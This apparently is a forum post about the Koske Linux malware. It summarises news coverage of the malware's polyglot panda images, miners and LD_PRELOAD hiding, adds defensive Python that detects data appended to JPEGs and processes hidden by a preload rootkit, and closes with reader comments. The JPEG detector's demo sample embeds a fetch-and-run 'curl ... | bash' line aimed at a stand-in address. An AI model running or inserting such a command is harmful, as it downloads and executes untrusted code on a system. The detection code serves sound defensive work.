A sophisticated Linux malware called Koske, discovered in July 2025, hides malicious code within innocent-looking panda bear JPEG images to deploy cryptocurrency miners and establish persistent system access[1]. Security researchers at AquaSec believe Koske was developed using artificial intelligence, based on its adaptive behaviors and code structure[2].

The malware exploits misconfigured JupyterLab instances to gain initial access, then downloads two panda images containing separate payloads: a C-based rootkit and a shell script[3]. Rather than using steganography, Koske employs polyglot files that function as both valid images and executable scripts[1].

Once executed, the malware:

  • Deploys CPU and GPU-optimized miners for 18 different cryptocurrencies
  • Establishes persistence through cron jobs and systemd services
  • Uses LD_PRELOAD to hide malicious processes and files
  • Manipulates DNS settings and network configurations
  • Automatically switches mining pools if one becomes unavailable[1]

“Impersonation and psychological warfare will be a big thing in the coming years,” warns Rem Dudas from Palo Alto Networks, noting how AI enables malware to mimic other threat actors’ techniques[4].


  1. BleepingComputer - New Koske Linux malware hides in cute panda images

  2. The420 - How Is A “Panda” Becoming a Persistent Threat?

  3. Securitricks - AI-Generated Malware in Panda Image Hides Persistent Linux Threat

  4. BetaNews - Hackers are using AI and panda images to infect Linux machines
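The polyglot trick described in the post is easy to check for on disk: for the file to remain a valid picture, anything appended to a JPEG has to sit after the End-Of-Image marker, so a file whose bytes continue past EOI is suspect. What follows is an added example, not Koske's code and not AquaSec's tooling. It walks the JPEG marker segments, stops at EOI (FF D9) and reports and classifies whatever follows. The sample images are constructed marker skeletons (not decodable pictures), and the appended "script" and its TEST-NET address are made up for the demo.

```python
"""Added example (not from the post or from Koske): report data appended after a JPEG's EOI marker."""
from __future__ import annotations

import sys

SOI, EOI, SOS = 0xD8, 0xD9, 0xDA
RST = range(0xD0, 0xD8)
# Markers that carry no length field: TEM, RST0..RST7, SOI, EOI.
STANDALONE = {0x01, SOI, EOI, *RST}


def jpeg_trailer(data: bytes) -> bytes | None:
    """Bytes after EOI (b'' when there are none), or None if `data` is not a JPEG."""
    if data[:2] != b"\xff\xd8":
        return None
    pos = 2
    while pos + 1 < len(data):
        if data[pos] != 0xFF:
            return None                      # lost marker sync: corrupt, or not a JPEG
        marker = data[pos + 1]
        if marker == 0xFF:                   # fill byte; the real marker follows
            pos += 1
            continue
        pos += 2
        if marker == EOI:
            return data[pos:]                # everything after EOI is foreign to the image
        if marker in STANDALONE:
            continue
        if pos + 2 > len(data):
            return None
        seg_len = int.from_bytes(data[pos:pos + 2], "big")   # length includes its own 2 bytes
        if seg_len < 2:
            return None
        pos += seg_len
        if marker == SOS:
            # Entropy-coded scan data follows the SOS header. Inside it, FF is always
            # followed by 00 (byte stuffing) or by an RSTn marker; any other FF xx ends the scan.
            while pos + 1 < len(data):
                if data[pos] == 0xFF and data[pos + 1] != 0x00 and data[pos + 1] not in RST:
                    break
                pos += 1
    return None                              # ran out of bytes before EOI


def classify_trailer(trailer: bytes) -> str:
    """Coarse label for appended bytes; anything other than 'none' deserves a look."""
    if not trailer:
        return "none"
    if trailer.startswith(b"#!"):
        return "shell script"
    if trailer.startswith(b"\x7fELF"):
        return "ELF binary"
    text_like = sum(32 <= b < 127 or b in b"\t\n\r" for b in trailer)
    return "text" if text_like / len(trailer) > 0.9 else "binary"


def scan_file(path: str) -> tuple[str, int]:
    """(label, trailer length) for a file on disk."""
    with open(path, "rb") as f:
        trailer = jpeg_trailer(f.read())
    if trailer is None:
        return ("not a JPEG", 0)
    return (classify_trailer(trailer), len(trailer))


def _jpeg_skeleton(trailer: bytes = b"") -> bytes:
    """Constructed marker stream (SOI, APP0/JFIF, a tiny SOS, scan bytes, EOI). Not decodable."""
    app0 = b"\xff\xe0" + (16).to_bytes(2, "big") + b"JFIF\x00\x01\x01\x00\x00\x01\x00\x01\x00\x00"
    sos = b"\xff\xda" + (8).to_bytes(2, "big") + b"\x01\x01\x00\x00\x3f\x00"
    scan = b"\x12\x34\xff\x00\x56\xff\xd0\x78"   # contains a stuffed FF00 and an RST0 marker
    return b"\xff\xd8" + app0 + sos + scan + b"\xff\xd9" + trailer


CLEAN_JPEG = _jpeg_skeleton()
# Constructed polyglot: the "script" and the TEST-NET address are made up for this demo.
POLYGLOT_JPEG = _jpeg_skeleton(b"#!/bin/bash\ncurl -s http://203.0.113.7/p | bash\n")

if __name__ == "__main__":
    for path in sys.argv[1:]:
        print(path, *scan_file(path))
    for name, blob in (("clean", CLEAN_JPEG), ("polyglot", POLYGLOT_JPEG)):
        trailer = jpeg_trailer(blob)
        print(name, classify_trailer(trailer), len(trailer))
```

Run it with image paths as arguments (`python3 jpeg_trailer.py /tmp/*.jpg`) or with none to see the two built-in samples. The check only covers data after EOI; text hidden inside a COM (FF FE) or APPn segment stays within the image structure and would need the segment payloads themselves to be inspected, which the same walker can do by collecting `data[pos:pos + seg_len]` for each segment.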
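Two cheap checks for the LD_PRELOAD hiding listed in the post, as an added example that is not Koske's code. The post does not say which libc calls Koske hooks, so the common design of such user-land rootkits is assumed here: a shared object listed in /etc/ld.so.preload that filters readdir() results so that `ls`, `ps` and `top` never see chosen pids or file names. The sample ld.so.preload text and the stand-in /proc contents used to exercise the code offline are constructed.

```python
"""Added example (not from the post or from Koske): cheap checks for an LD_PRELOAD rootkit."""
from __future__ import annotations

import os
from collections.abc import Callable


def preload_entries(text: str) -> list[str]:
    """Library paths listed in /etc/ld.so.preload (one per line, '#' starts a comment).
    The file is normally absent or empty, so any entry is worth explaining."""
    entries = []
    for line in text.splitlines():
        line = line.split("#", 1)[0].strip()
        if line:
            entries.append(line)
    return entries


def tgid_of(status_text: str) -> int | None:
    """Thread-group id from a /proc/<id>/status file; equals the id only for a process leader."""
    for line in status_text.splitlines():
        if line.startswith("Tgid:"):
            return int(line.split()[1])
    return None


def _read_or_none(path: str) -> str | None:
    try:
        with open(path) as f:
            return f.read()
    except OSError:
        return None


def hidden_pids(listdir: Callable[[str], list[str]] = os.listdir,
                read_text: Callable[[str], str | None] = _read_or_none,
                pid_max: int | None = None) -> list[int]:
    """Pids that answer at /proc/<pid>/status but that readdir('/proc') does not list.

    A hook that filters readdir() hides entries from `ls /proc` and from `ps`
    (procps walks /proc with readdir) but cannot stop open("/proc/<pid>/status")
    from succeeding unless open()/stat() are hooked as well. Threads are skipped on
    purpose: /proc/<tid> resolves for every thread while readdir lists only group
    leaders, so without the Tgid check every multithreaded process would look hidden.
    """
    if pid_max is None:
        pid_max = int(read_text("/proc/sys/kernel/pid_max") or 32768)
    visible = {int(name) for name in listdir("/proc") if name.isdigit()}
    found = []
    for pid in range(1, pid_max + 1):
        if pid in visible:
            continue
        status = read_text(f"/proc/{pid}/status")
        if status is not None and tgid_of(status) == pid:
            found.append(pid)
    return found


# Constructed stand-in for /proc, used to exercise the check offline: pid 3 is missing
# from the directory listing but answers directly (hidden), pid 4 is a thread of pid 2.
FAKE_PROC_LISTING = ["1", "2", "self", "sys"]
FAKE_PROC_FILES = {
    "/proc/1/status": "Name:\tsystemd\nTgid:\t1\nPid:\t1\n",
    "/proc/2/status": "Name:\tkthreadd\nTgid:\t2\nPid:\t2\n",
    "/proc/3/status": "Name:\tminer\nTgid:\t3\nPid:\t3\n",
    "/proc/4/status": "Name:\tworker\nTgid:\t2\nPid:\t4\n",
}

if __name__ == "__main__":
    print("ld.so.preload:", preload_entries(_read_or_none("/etc/ld.so.preload") or ""))
    print("hidden pids (demo):", hidden_pids(lambda d: FAKE_PROC_LISTING, FAKE_PROC_FILES.get, pid_max=10))
    print("hidden pids (this host):", hidden_pids())
```

On a live host the pid sweep opens up to pid_max paths (4194304 on most systemd systems), which takes a few seconds in Python; a pid that is created between the listing and the sweep shows up as a false positive, so run it twice and keep the intersection. A rootkit that also hooks open(), stat() and the reads of /etc/ld.so.preload defeats both checks, at which point the comparison has to be made from outside the hooked libc (a static binary, or a disk image inspected off-host).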

  • baod_rate@programming.dev · 6 days ago

    Researchers from AquaSec have noted its ability to automatically switch to backup mining pools if a primary one becomes unavailable, ensuring continuous operation. This level of sophistication has led security experts to believe that large language models or other automation frameworks may have played a role in its development.

    Is it just me or is this not a very convincing rationale.

    • AmbitiousProcess (they/them)@piefed.social · 6 days ago

      Not whatsoever.

      Practically any mining software would allow you to change a pool whenever you felt like it, and making a script that just goes “oh, x.x.x.x isn’t responding anymore, I should point my hashrate to y.y.y.y now” is… not hard, to say the least.

    • baod_rate@programming.dev · 6 days ago

      It’s just a consequence of independent file formats. There’s bound to be overlap in what counts as technically a valid X and also technically a valid Y. It’s pretty much unavoidable. The tricky part is figuring out what fits in that sliver of the venn diagram but is also useful as malware.